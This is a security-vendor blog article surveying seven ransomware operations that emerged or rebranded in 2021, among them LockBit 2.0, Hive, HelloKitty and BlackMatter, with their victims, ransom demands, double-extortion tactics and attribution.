Several of the largest and most infamous ransomware organizations vanished after a run of high-profile attacks in the middle of this year.
Ransomware attacks by Russian-language groups Conti against Ireland’s health service, DarkSide against Colonial Pipeline in the United States, and REvil against meat processing giant JBS and remote management software firm Kaseya prompted the Biden administration to try to disrupt the ransomware business model more effectively beginning in May. The White House has warned Russia that if it does not take action against ransomware-wielding criminals operating within its borders, the US has the right to do so.
DarkSide and REvil vanished quickly, as did Avaddon, with security experts claiming they were fleeing for their lives. All of them were ransomware-as-a-service operations, in which the operators created a crypto-locking malware and distributed it to their affiliates – effectively self-employed contractors – who further infected victims. When a victim pays, the affiliate and operator split the money according to a predetermined formula.
At least, that’s how it works in theory. A new site was found by a security firm and they recently claimed that a dissatisfied Conti affiliate released training manuals and technical guidelines, claiming that he was being underpaid.
The emergence of New and Re-invented Operations
Given the tremendous economic potential that ransomware currently offers, as well as the fact that many enterprises are still unprotected, many security experts anticipate that the key operators behind Avaddon, DarkSide, and REvil will just rebrand themselves. Meanwhile, affiliates frequently collaborate with several ransomware operations, sometimes at the same time. As a result, even though some groups appear to come and go, the ransomware business model continues to thrive.
New ransomware gangs emerge on a daily basis. Law enforcement officials and information security specialists have been monitoring an increase in activity from lesser-known players, including the launch of new organizations, in recent weeks. All of them practice double extortion, which means they claim to have stolen data before crypto-locking systems and then threaten to disclose it to a data-leak site unless the victims decided to pay the ransom.
ALTDOS, AvosLocker, Hive, HelloKitty, LockBit 2.0, and OnePercent Group, as well as the DarkSide spinoff BlackMatter, are among the seven operations detailed below.
- ALTDOS
Background – ALTDOS initially made an appearance in late 2020, when they claimed their first victim, a Thai securities trading firm. ALTDOS has claimed a number of victims in Bangladesh, Singapore, and Thailand thus far. The threat actor tends to target enterprises for financial gain especially in Southeast Asia and Bangladesh.
Since its inception in December, the ALTDOS cybercrime operation has continued to target firms in Bangladesh, Singapore, and Thailand, according to Singapore’s Cyber Security Agency, police force, and Personal Data Protection Commission.
According to their joint advice on ALTDOS, it is presently uncertain which ransomware strain is used by ALTDOS. ALTDOS will… approach the victim using a ProtonMail-hosted email account, demanding payment or the exfiltrated data will be exposed.
If the victim does not reply or comply with the ransom demand within the specified time limit, ALTDOS may conduct a distributed denial-of-service assault on the victim’s internet-facing systems to impair operational services and remind them to pay the money – the advisory continues.
ALTDOS, like the aforementioned ransomware gangs, extorts victims to pay a ransom not only for the promise of receiving a decryption tool in return but also for the guarantee that data were stolen by attackers – before they crypto-locked systems – will be wiped. The organization occasionally wants further ransom payments for a decryptor rather than a pledge to destroy stolen data, according to the advice.
- AvosLocker
Researchers said the operation appeared to be focusing on smaller law businesses, as well as freight, logistics, and real estate firms, in the United States, the United Kingdom, and portions of Europe, when it was first discovered in June. However, towards the end of last month, the little business looked to be still recruiting affiliates, for example, through spam adverts broadcast over Jabber and Telegraph.
Recently, AvosLocker’s Tor-based data-leak site named 11 victims, including Moorfields Eye Hospitals UAE, a part of the Moorfields Eye Hospital Foundation Trust of the British National Health Service, from which the group claims it stole more than 60GB of data. The incident was acknowledged by various researchers, although it was not attributed.
According to experts, AvosLocker, like many of its competitors, promises technical support to help victims recover after they’ve been attacked with encryption software that the company claims is ‘fail-proof,’ has low detection rates, and can handle huge files. They saw initial ransom demands ranging from $50,000 to $75,000.
- Hive
According to experts, the Hive ransomware was originally discovered on June 26 by the self-described “ransomware hunter” behind the @fbgwls245 Twitter account, who discovered the group’s harmful executable when it was uploaded to the VirusTotal malware-scanning site.
Hive’s data-leak site just mentioned 34 victims. “Hive employs all extortion methods available to put pressure on the victim, including the date of initial compromise, a countdown, the date the leak was actually exposed on their site, and even the ability to post the disclosed leak on social media,” researchers stated.
A threat expert bemoaned the code’s poor quality, claiming that examples of Hive seen so far employed “an absurd and unprofessional cryptographic method in which 100 RSA keys of varied bit sizes are used to encrypt files,” which would make recovery difficult.
- HelloKitty
HelloKitty ransomware attacks were first discovered in early 2020. In April, it was reported that HelloKitty-wielding attackers were targeting SonicWall SMA 100 Series unified access gateways that had not been patched. The vendor confirmed a zero-day weakness in the devices, CVE-2021-20016, on Jan. 23 and patched it on Feb. 23.
Researchers discovered “a Linux form of HelloKitty targeting VMware’s ESXi hypervisor, which is extensively used in cloud and on-premises data centers,” according to a report published in July. Because of the enormous ransoms that could be demanded if attackers successfully crypto-locked these systems, the ESXi hypervisor was most likely targeted. They went on to say that HelloKitty-wielding attackers had sought up to $10 million in ransom, but that they just got a trio of huge ransoms totaling only $1.5 million.
- Lockbit 2.0
LockBit, formerly known as ABCD ransomware, has been operating since September 2019, although it just introduced malware branded LockBit 2.0 by the operation. Accenture is one of its most recent victims.
According to security researchers, LockBit 2.0 boasts of being one of the fastest and most efficient encryption algorithms in today’s ransomware threat scenario.
A spokesman for the group, who goes by the handle “LockBitSupp,” recently granted an interview to the Russian OSINT YouTube channel, extolling the virtues of his operation program, which he claims remits 80% of every ransom paid to the responsible affiliate in an apparent bid to raise the group’s profile and attract new affiliates. Operators are continuing to enhance the malware and other tools in an effort to make attacks not only speedier but also more automated, according to LockBitSupp, which includes exfiltrating data and sending it to a specific data-leak site.
The LockBit 2.0 leak site had 64 victims as of last week, some of whom had already had their stolen information published and others for whom a countdown timer was still running.
- One percent Group
The FBI issued a flash notice on the OnePercent Group, warning that it has been operating since November 2020 and infects victims with the IcedID – alias BokBot – banking Trojan through phishing attacks. The phishing emails contain zip files that contain a Microsoft Word or Excel document with a malicious macro meant to install the malware, which drops and runs the Cobalt Strike penetration-testing tool.
The attackers migrate laterally across the network using PowerShell scripting, employing the Rclone tool to exfiltrate data to cloud storage before spreading their crypto-locking malware on every feasible target, according to the FBI.
“The perpetrators were seen on the victim’s network for about one month prior to the ransomware’s deployment,” according to the FBI.
“The victim will then begin to receive phone calls from spoofed phone numbers with ransom demands, as well as a ProtonMail email address for further communication,” according to the FBI. “The actors will insist on speaking with a victim company’s designated negotiator or otherwise threaten to disclose the stolen material,” says the report.
The gang has previously threatened to sell the stolen data to the REvil, alias Sodinokibi group, if victims fail to pay, it claims.
- BlackMatter Ransomware
Late in July, a member with the handle “BlackMatter” on a cybercrime site announced the birth of a new operation that “combined the greatest elements of DarkSide, REvil, and LockBit into itself.”
“I am confident that we are dealing with a DarkSide branding here,” a ransomware expert said after evaluating a BlackMatter decryptor discovered in the wild. At the same time, a Blockchain research organization has looked into the cryptocurrency wallets utilized by BlackMatter, concluding that it is a rebrand of DarkSide.
As a result, predictions that ransomware operators would simply change their names appear to have come true. “We’ve known for 50 years that hacking is an addictive behavior,” says William Hugh Murray, an information security veteran. “Expecting reform is naïve. Reform or retirement are significantly less likely than rebranding.”
To read more, please check eScan Blog
